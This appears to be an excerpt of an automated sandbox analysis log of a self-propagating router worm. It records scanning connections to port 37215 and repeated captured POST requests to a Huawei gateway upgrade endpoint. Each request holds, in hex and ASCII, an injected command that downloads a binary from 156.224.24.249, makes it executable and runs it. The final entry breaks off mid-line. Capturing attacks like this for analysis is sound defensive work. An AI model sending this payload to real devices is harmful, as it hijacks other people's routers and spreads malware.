          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 161.68.5.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.153.246.130:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.56.167.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.175.11.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.168.101.0:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.52.135.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 221.228.246.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.211.64.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.162.254.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.124.212.62:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 118.19.19.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.174.110.195:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.138.114.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 162.169.211.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.176.157.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.57.21.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.228.124.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.15.95.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.225.81.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.29.220.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.214.11.149:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.142.139.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.90.84.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 194.174.188.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.12.9.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 41.128.208.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.110.30.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 87.138.12.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 95.133.229.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.12.216.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 157.119.35.163:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 197.26.75.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:40312 -> 54.153.99.40:37215
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 